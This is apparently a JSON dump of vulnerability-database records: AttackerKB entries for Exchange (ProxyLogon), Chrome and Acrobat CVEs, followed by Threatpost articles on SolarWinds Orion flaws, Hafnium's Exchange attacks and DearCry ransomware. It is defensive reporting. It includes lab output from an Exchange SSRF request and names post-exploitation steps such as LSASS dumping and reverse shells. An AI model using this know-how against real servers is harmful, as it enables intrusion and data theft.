<EcpUrl-tmCreating>options/ecp/?rfr=olk&ftr=TeamMailboxCreating&SPUrl=<SPUrl>&Title=<Title>&SPTMAppUrl=<SPTMAppUrl>&exsvurl=1&realm=gibson.local</EcpUrl-tmCreating>\n <EcpUrl-tmEditing>options/ecp/?rfr=olk&ftr=TeamMailboxEditing&Id=<Id>&exsvurl=1&realm=gibson.local</EcpUrl-tmEditing>\n <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>\n <OOFUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</OOFUrl>\n <UMUrl>https://win-t4ro9496ta7.gibson.local/EWS/UM2007Legacy.asmx</UMUrl>\n <ServerExclusiveConnect>off</ServerExclusiveConnect>\n </Protocol>\n <Protocol>\n <Type>EXPR</Type>\n <Server>win-t4ro9496ta7.gibson.local</Server>\n <SSL>Off</SSL>\n <AuthPackage>Ntlm</AuthPackage>\n <ServerExclusiveConnect>on</ServerExclusiveConnect>\n <CertPrincipalName>None</CertPrincipalName>\n <GroupingInformation>Default-First-Site-Name</GroupingInformation>\n </Protocol>\n <Protocol>\n <Type>WEB</Type>\n <Internal>\n <OWAUrl AuthenticationMethod=\"Basic, Fba\">https://win-t4ro9496ta7.gibson.local/owa/</OWAUrl>\n <Protocol>\n <Type>EXCH</Type>\n <ASUrl>https://win-t4ro9496ta7.gibson.local/EWS/Exchange.asmx</ASUrl>\n </Protocol>\n </Internal>\n </Protocol>\n </Account>\n </Response>\n * Connection #0 to host 192.168.123.207 left intact\n </Autodiscover>* Closing connection 0\n wvu@kharak:~/Downloads$\n \n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-03-03T00:00:00", "type": "attackerkb", "title": "CVE-2021-26855", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-27078"], "modified": "2021-03-03T00:00:00", "id": "AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "href": "https://attackerkb.com/topics/eIPBftle3R/cve-2021-26855", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-23T17:13:30", "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAF\u2019s require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, a object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. Time will tell if this trend continues though, but it is interesting to see such an regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-24T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-06T20:18:46", "description": "Acrobat Reader DC versions versions 2020.013.20074 (and earlier), 2020.001.30018 (and earlier) and 2017.011.30188 (and earlier) are affected by a heap-based buffer overflow vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**ccondon-r7** at March 30, 2021 10:13pm UTC reported:\n\nHeap-based buffer overflow used in \u201climited, targeted attacks\u201d according to Adobe\u2019s advisory: <https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>\n\n**NinjaOperator** at June 28, 2021 5:32pm UTC reported:\n\nHeap-based buffer overflow used in \u201climited, targeted attacks\u201d according to Adobe\u2019s advisory: <https://helpx.adobe.com/security/products/acrobat/apsb21-09.html>\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21017", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21017"], "modified": "2021-02-12T00:00:00", "id": "AKB:A85EDE41-3F67-480B-8858-46B5D866EB51", "href": "https://attackerkb.com/topics/ysmVomBsUw/cve-2021-21017", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-11-19T15:23:32", "description": "Equation Editor in Microsoft Office 2007, Microsoft Office 2010, Microsoft Office 2013, and Microsoft Office 2016 allow a remote code execution vulnerability due to the way objects are handled in memory, aka \u201cMicrosoft Office Memory Corruption Vulnerability\u201d. This CVE is unique from CVE-2018-0797 and CVE-2018-0812.\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2018-01-10T00:00:00", "type": "attackerkb", "title": "CVE-2018-0802", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11882", "CVE-2018-0797", "CVE-2018-0802", "CVE-2018-0812"], "modified": "2021-07-27T00:00:00", "id": "AKB:6AB45633-1353-4F19-B0F2-33448E9488A2", "href": "https://attackerkb.com/topics/e8I0KcDoDu/cve-2018-0802", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-29T20:35:00", "description": "Heap buffer overflow in V8 in Google Chrome prior to 88.0.4324.150 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at February 05, 2021 4:25pm UTC reported:\n\nReported as exploited in the wild at <https://chromereleases.googleblog.com/2021/02/stable-channel-update-for-desktop_4.html>. Several news articles such as <https://www.theverge.com/2021/2/5/22267872/chrome-88-zero-day-vulnerability-government-backed-hackers-security-researchers> have suggested that given the timing of this bug, and that it was reported one day before Google\u2019s report on the North Korea hackers targeting security researchers (see <https://www.theverge.com/2021/1/26/22250060/google-threat-analysis-group-north-korean-hackers-cybersecurity-researchers-social-engineering>), it may be related to the 0day Chrome bug that was used by North Korean state actors in that engagement.\n\nGiven this is a remote heap overflow in the browser there may be some concerns regarding reliability though and whilst I\u2019m sure there will be public exploits for this bug, I do question how reliable they will be given the nature of trying to exploit heap exploits. I would imagine the exploit would take advantage of JavaScript to craft the heap appropriately. Therefore a temporary, but not recommended, precaution may be to disable JavaScript in Chrome until one can apply this update.\n\nPlease note that Chrome will automatically apply the update if you open and close your browser. However people do tend to keep Chrome open with many tabs and then suspend their PC at the end of the day, so its possible that these patches will likely see an uptick in application when the next Patch Tuesday or company wide patch cycle is enforced and people are forced to reboot their PCs to apply patches, and therefore restart Chrome.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-02-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21148", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148"], "modified": "2021-02-13T00:00:00", "id": "AKB:B61D2687-96CE-4CE9-939F-9E35DA7814C4", "href": "https://attackerkb.com/topics/9stbF9rFqe/cve-2021-21148", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-02-03T22:38:15", "description": "Three serious vulnerabilities have been found in SolarWinds products: Two in the Orion User Device Tracker and one in the Serv-U FTP for Windows product. The most severe of these could allow trivial remote code execution with high privileges.\n\nThe SolarWinds Orion platform is the network management tool at the heart of [the recent espionage attack](<https://threatpost.com/mimecast-solarwinds-hack-security-vendor-victims/163431/>) against several U.S. government agencies, tech companies and other high-profile targets. It allows users to manage devices, software and firmware versioning, applications and so on, and has full visibility into enterprise customer networks.\n\nThese fresh vulnerabilities have not been shown to be used in the spy attack, but admins should nonetheless apply patches as soon as possible, according to Martin Rakhmanov, security research manager for SpiderLabs at Trustwave.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nTrustwave is not providing specific proof-of-concept (PoC) code until Feb. 9, in order to give SolarWinds users a longer time to patch, he noted in a Wednesday blog posting.\n\n## **Microsoft Messaging for SolarWinds Orion Takeover**\n\nThe most critical bug (CVE-2021-25274) does not require local access and allows complete control over SolarWinds Orion remotely without having any credentials at all.\n\nAs a part of the platform installation, there is a setup for Microsoft Messaging Queue (MSMQ), which is a two-decade-old technology that is no longer installed by default on modern Windows systems.\n\n\u201cImproper use of MSMQ could allow any remote unprivileged user the ability to execute any arbitrary code in the highest privilege,\u201d according to [Trustwave\u2019s advisory](<https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=28389>), issued on Wednesday.\n\nRakhmanov said that it\u2019s possible for unauthenticated users to send messages to private queues over TCP port 1801.\n\n\u201cMy interest was piqued and I [also] jumped in to look at the code that handles incoming messages,\u201d he explained. \u201cUnfortunately, it turned out to be an unsafe deserialization victim. [This] allows remote code execution by remote, unprivileged users through combining those two issues. Given that the message processing code runs as a Windows service configured to use LocalSystem account, we have complete control of the underlying operating system.\u201d\n\n## **Info-Stealing from the Orion Database**\n\nThe second bug (CVE-2021-25275) was also found in the SolarWinds Orion framework. It allows unprivileged users who can log in locally or via Remote Desktop Protocol (RDP) to obtain a cleartext password for the backend database for the Orion platform, called SolarWindsOrionDatabaseUser \u2013 and from there set themselves up as an admin to steal information.\n\n\u201cSolarWinds credentials are stored in an insecure manner that could allow any local users, despite privileges, to take complete control over the SOLARWINDS_ORION database,\u201d according to Trustwave.\n\nPermissions are generously granted to all locally authenticated users, Rakhmanov found, and authenticated users can generally read database file content. He ran \u201ca simple grep\u201d (a Unix command used to search files for the occurrence of a string of characters that matches a specified pattern) across the files installed by the product to look for a configuration file, which he located.\n\nInside the config file were the Orion backend database credentials, albeit encrypted.\n\n\u201cI spent some time finding code that decrypts the password but essentially, it\u2019s a one-liner,\u201d he noted.\n\nOnce an unprivileged user runs the decrypting code, they can get a cleartext password for the SolarWindsOrionDatabaseUser.\n\n\u201cThe next step is to connect to the Microsoft SQL Server using the recovered account, and at this point, we have complete control over the SOLARWINDS_ORION database,\u201d Rakhmanov explained. \u201cFrom here, one can steal information or add a new admin-level user to be used inside SolarWinds Orion products.\u201d\n\n## **Adding Admin Users**\n\nThe third issue is a SolarWinds Serv-U FTP vulnerability (CVE-2021-25276). The product is used for secure transfer and large file-sharing.\n\nThe bug allows local privilege escalation so that an attacker gains the ability to read, write to or delete any file on the system.\n\n\u201cAny local user, regardless of privilege, can create a file that can define a new Serv-U FTP admin account with full access to the C:\\ drive,\u201d according to Trustwave. \u201cThis account can then be used to log in via FTP and read or replace any file on the drive.\u201d\n\nRakhmanov discovered that the platform\u2019s directory access control lists allow complete compromise by any authenticated Windows user.\n\n\u201cSpecifically, anyone who can log in locally or via Remote Desktop can just drop a file that defines a new user, and the Serv-U FTP will automatically pick it up,\u201d he explained. \u201cNext, since we can create any Serv-U FTP user, it makes sense to define an admin account by setting a simple field in the file and then set the home directory to the root of C:\\ drive.\u201d\n\nSolarWinds patches are available, in Orion Platform 2020.2.4 and ServU-FTP 15.2.2 Hotfix 1.\n\nRakhmanov did issue a caveat on the fix for the CVE-2021-25275 info-stealing bug.\n\n\u201cAfter the patch is applied, there is a digital signature validation step performed on arrived messages so that messages having no signature or not signed with a per-installation certificate are not further processed,\u201d he explained. \u201cOn the other hand, the MSMQ is still unauthenticated and allows anyone to send messages to it.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) _**Healthcare Security Woes Balloon in a Covid-Era World**_**, sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** \u2013 on us!**\n", "cvss3": {}, "published": "2021-02-03T11:00:21", "type": "threatpost", "title": "SolarWinds Orion Bug Allows Easy Remote-Code Execution and Takeover", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-25274", "CVE-2021-25275", "CVE-2021-25276"], "modified": "2021-02-03T11:00:21", "id": "THREATPOST:9347B4A695C8250B35A5455A788D2D99", "href": "https://threatpost.com/solarwinds-orion-bug-remote-code-execution/163618/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-03T22:09:32", "description": "Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.\n\nThe attacks are \u201climited and targeted,\u201d according to Microsoft, spurring it to release [out-of-band patches](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nHowever, other researchers [have reported](<https://www.reddit.com/r/msp/comments/lwmo5c/mass_exploitation_of_onprem_exchange_servers/>) seeing the activity compromising mass swathes of victim organizations.\n\n\u201cThe team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,\u201d a spokesperson at Huntress told Threatpost.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.\n\n\u201cMicrosoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,\u201d according to [an announcement](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) this week from Microsoft on the attacks.\n\n## **Zero-Day Security Bugs in Exchange Server**\n\n\u201cThe fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week\u2019s [Patch Tuesday](<https://threatpost.com/exploited-windows-kernel-bug-takeover/163800/>) release leads us to believe the flaws are quite severe even if we don\u2019t know the full scope of those attacks,\u201d Satnam Narang, staff research engineer at Tenable, said via email.\n\nMicrosoft patched following bugs this week, and admins should update accordingly:\n\n * **CVE-2021-26855** is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.\n * **CVE-2021-26857** is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.\n * **CVE-2021-26858** and **CVE-2021-27065** are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server \u2013 thus achieving remote code execution (RCE).\n\nResearchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, \u201cThis vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.\u201d\n\nThey also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.\n\nIn addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.\n\n\u201cBased on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user\u2019s mailbox,\u201d said Tenable\u2019s Narang. \u201cThe other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization\u2019s network.\u201d\n\n## **What Happened in the Hafnium Attacks?**\n\nIn the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.\n\n\u201cIn all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,\u201d according to [Volexity\u2019s writeup](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>).\n\nFollowing web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:\n\n * Using Procdump to dump the LSASS process memory;\n * Using 7-Zip to compress stolen data into ZIP files for exfiltration;\n * Adding and using Exchange PowerShell snap-ins to export mailbox data;\n * Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;\n * And downloading PowerCat from GitHub, then using it to open a connection to a remote server.\n\nThe attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.\n\n\u201cThe good news for defenders is that the post-exploitation activity is very detectable,\u201d said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. \u201cSome of the activity we observed uses [the China Chopper web shell](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>), which has been around for more than eight years, giving defenders ample time to develop detection logic for it.\u201d\n\n## **Who is the Hafnium APT?**\n\nHafnium has been tracked by Microsoft before, but the company has [only just released a few details](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>) on the APT.\n\nIn terms of its tactics, \u201cHafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,\u201d according to Microsoft. \u201cOnce they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.\u201d\n\nHafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as \u201ca highly skilled and sophisticated actor.\u201d\n\n## **Time to Patch: Expect More Attacks Soon**\n\nIt should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.\n\n\u201cWe expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,\u201d he added.\n\nAnd indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.\n\nThey\u2019re not alone.\n\n\u201cFireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,\u201d Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. \u201cIn addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.\u201d\n", "cvss3": {}, "published": "2021-03-03T15:30:52", "type": "threatpost", "title": "Microsoft Exchange 0-Day Attackers Spy on U.S. Targets", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T15:30:52", "id": "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "href": "https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-03-16T14:17:03", "description": "Cybercriminals are now using compromised Microsoft Exchange servers as a foothold to deploy a new ransomware family called DearCry, Microsoft has warned.\n\nThe ransomware is the latest threat to beleaguer vulnerable Exchange servers, emerging shortly after Microsoft [issued emergency patches in early March](<https://threatpost.com/microsoft-exchange-zero-day-attackers-spy/164438/>) for four Microsoft Exchange flaws. The flaws [can be chained together](<https://threatpost.com/microsoft-patch-tuesday-updates-critical-bugs/164621/>) to create a pre-authentication remote code execution (RCE) exploit \u2013 meaning that attackers can take over servers without knowing any valid account credentials.\n\nThe flaws give attackers the opportunity to install a webshell for further exploitation within the environment \u2014 and now, researchers say attackers are downloading the new ransomware strain (a.k.a. Ransom:Win32/DoejoCrypt.A) as part of their post-exploitation activity on unpatched servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cWe have detected and are now blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers,\u201d Microsoft said [on Twitter](<https://twitter.com/MsftSecIntel/status/1370236539427459076>), Thursday.\n\n## **DearCry Ransomware**\n\nDearCry first came onto the infosec space\u2019s radar after ransomware expert Michael Gillespie [on Thursday said he observed](<https://twitter.com/demonslay335/status/1370125343571509250>) a \u201csudden swarm\u201d of submissions to his ransomware identification website, ID-Ransomware.\n\nThe ransomware uses the extension \u201c.CRYPT\u201d when encrypting files, as well as a filemarker \u201cDEARCRY!\u201d in the string for each encrypted file.\n\n[Microsoft later confirmed](<https://twitter.com/phillip_misner/status/1370197696280027136>) that the ransomware was being launched by attackers using the four Microsoft Exchange vulnerabilities, known collectively as ProxyLogon, which are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\nhttps://twitter.com/demonslay335/status/1370125343571509250\n\nAccording to a [report by BleepingComputer](<https://www.bleepingcomputer.com/news/security/ransomware-now-attacks-microsoft-exchange-servers-with-proxylogon-exploits/amp/>), the ransomware drops a ransom note (called \u2018readme.txt\u2019) after initially infecting the victim \u2013 which contains two email addresses for the threat actors and demands a ransom payment of $16,000.\n\nMeanwhile, [MalwareHunterTeam](<https://twitter.com/malwrhunterteam/status/1370130753586102272>) on Twitter said that victim companies of DearCry have been spotted in Australia, Austria, Canada, Denmark and the U.S. On Twitter, MalwareHunterTeam said the ransomware is \u201cnot that very widespread (yet?).\u201d Thus far, three samples of the DearCry ransomware were uploaded to VirusTotal on March 9 (the hashes for which [can be found here)](<https://twitter.com/malwrhunterteam/status/1370271414855593986>).\n\n## **Microsoft Exchange Attacks Doubling Every Hour**\n\nExploitation activity for the recently patched Exchange flaws continue to skyrocket, [with researchers this week warning](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>) the flaws are under fire from at least 10 different advanced persistent threat (APT) groups, all bent on compromising email servers around the world.\n\n[New research by Check Point Software](<https://blog.checkpoint.com/2021/03/11/exploits-on-organizations-worldwide/>) said in the past 24 hours alone, the number of exploitation attempts on organizations have doubled every two to three hours.\n\nResearchers said they saw hundreds of exploit attempts against organizations worldwide \u2013 with the most-targeted industry sectors being government and military (making up 17 percent of all exploit attempts), manufacturing (14 percent) and banking (11 percent).\n\nResearchers warned that exploitation activity will continue \u2014 and urged companies that have not already done so to patch.\n\n\u201cSince the recently disclosed vulnerabilities on Microsoft Exchange Servers, a full race has started amongst hackers and security professionals,\u201d according to Check Point researchers. \u201cGlobal experts are using massive preventative efforts to combat hackers who are working day-in and day-out to produce an exploit that can successfully leverage the remote code-execution vulnerabilities in Microsoft Exchange.\u201d\n\n**_Check out our free [upcoming live webinar events](<https://threatpost.com/category/webinars/>) \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community:_**\n\n * March 24: **Economics of 0-Day Disclosures: The Good, Bad and Ugly **([Learn more and register!](<https://threatpost.com/webinars/economics-of-0-day-disclosures-the-good-bad-and-ugly/>))\n * April 21: **Underground Markets: A Tour of the Dark Economy **([Learn more and register!](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/>))\n", "cvss3": {}, "published": "2021-03-12T16:26:07", "type": "threatpost", "title": "Microsoft Exchange Exploits Pave a Ransomware Path", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-12T16:26:07", "id": "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "href": "https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-11T21:58:44", "description": "Recently patched Microsoft Exchange vulnerabilities 